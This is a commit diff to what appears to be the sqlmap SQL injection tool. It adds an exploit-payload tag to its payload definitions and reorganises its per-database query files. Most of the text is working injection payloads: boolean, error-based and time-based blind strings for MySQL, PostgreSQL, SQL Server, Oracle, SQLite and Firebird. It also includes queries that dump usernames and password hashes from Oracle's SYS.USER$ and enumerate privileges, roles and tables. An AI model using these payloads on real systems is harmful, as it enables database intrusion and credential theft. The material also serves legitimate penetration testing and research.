Added an <epayload> sub-tag to the <test> tag in payloads.xml to define which payload to use when exploiting the test type.
Removed some useless tests. Moved <error> from queries.xml to payloads.xml as it makes more sense. Beeps at sql inj found only if --beep is provided. Minor fix in order to be able to pickle advancedDict() objects. Minor code refactoring. Removed useless folders.
@@ -126,6 +126,9 @@ Tag: <test>
|
||||
original value to its negative representation
|
||||
3: Replace the parameter original value
|
||||
|
||||
Sub-tag: <epayload>
|
||||
The payload that will be used to exploit the injection point.
|
||||
|
||||
Sub-tag: <request>
|
||||
What to inject for this test.
|
||||
|
||||
@@ -187,6 +190,7 @@ Formats:
|
||||
<risk></risk>
|
||||
<clause></clause>
|
||||
<where></where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload></payload>
|
||||
<comment></comment>
|
||||
@@ -403,6 +407,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
@@ -418,6 +423,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
@@ -436,6 +442,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
@@ -455,6 +462,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
@@ -473,6 +481,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
@@ -491,6 +500,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -511,6 +521,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
@@ -526,6 +537,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
@@ -545,6 +557,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
@@ -563,6 +576,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
@@ -581,6 +595,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -601,6 +616,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
@@ -619,6 +635,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
@@ -638,6 +655,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
||||
</request>
|
||||
@@ -656,6 +674,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
@@ -674,6 +693,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -699,6 +719,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
@@ -718,6 +739,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||
<request>
|
||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
@@ -736,6 +758,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||
<request>
|
||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
@@ -754,6 +777,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -772,6 +796,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
@@ -791,6 +816,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||
<request>
|
||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
@@ -809,6 +835,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||
<request>
|
||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
@@ -827,6 +854,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -1078,6 +1106,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||
<request>
|
||||
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
@@ -1097,6 +1126,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||
<request>
|
||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
@@ -1108,25 +1138,6 @@ Formats:
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL > 8.1 AND time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>AND PG_SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>> 8.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 AND time-based blind</title>
|
||||
<stype>5</stype>
|
||||
@@ -1134,6 +1145,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
@@ -1154,6 +1166,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
@@ -1167,7 +1180,7 @@ Formats:
|
||||
</test>
|
||||
<!--
|
||||
NOTE: there is no way to perform this test against Microsoft SQL
|
||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
||||
Server, Sybase, Oracle or PostgreSQL
|
||||
-->
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of AND time-based blind tests -->
|
||||
@@ -1181,6 +1194,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||
<request>
|
||||
<payload>OR SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
@@ -1200,6 +1214,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||
<request>
|
||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
@@ -1211,25 +1226,6 @@ Formats:
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL > 8.1 OR time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>OR PG_SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>> 8.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 OR time-based blind</title>
|
||||
<stype>5</stype>
|
||||
@@ -1237,6 +1233,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
@@ -1257,6 +1254,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
@@ -1270,7 +1268,7 @@ Formats:
|
||||
</test>
|
||||
<!--
|
||||
NOTE: there is no way to perform this test against Microsoft SQL
|
||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
||||
Server, Sybase, Oracle or PostgreSQL
|
||||
-->
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of OR time-based blind tests -->
|
||||
|
||||
159
xml/queries.xml
159
xml/queries.xml
@@ -24,7 +24,6 @@
|
||||
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
||||
<substring query="MID((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
|
||||
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
||||
<banner query="VERSION()"/>
|
||||
<current_user query="CURRENT_USER()"/>
|
||||
@@ -74,84 +73,6 @@
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s, ' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--"/>
|
||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||
<current_user query="SELECT USER FROM DUAL"/>
|
||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||
<!--
|
||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||
SELECT USERENV('ISDBA') FROM DUAL
|
||||
-->
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
||||
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
SELECT * FROM SESSION_PRIVS
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
SELECT * FROM SESSION_ROLES
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||
<dbs/>
|
||||
<tables>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db/>
|
||||
<search_table>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- PostgreSQL -->
|
||||
<dbms value="PostgreSQL">
|
||||
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
||||
@@ -175,7 +96,6 @@
|
||||
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
||||
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||
<banner query="SELECT VERSION()"/>
|
||||
<current_user query="SELECT CURRENT_USER"/>
|
||||
@@ -242,7 +162,6 @@
|
||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SYSTEM_USER"/>
|
||||
@@ -290,6 +209,83 @@
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s, ' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--"/>
|
||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||
<current_user query="SELECT USER FROM DUAL"/>
|
||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||
<!--
|
||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||
SELECT USERENV('ISDBA') FROM DUAL
|
||||
-->
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
||||
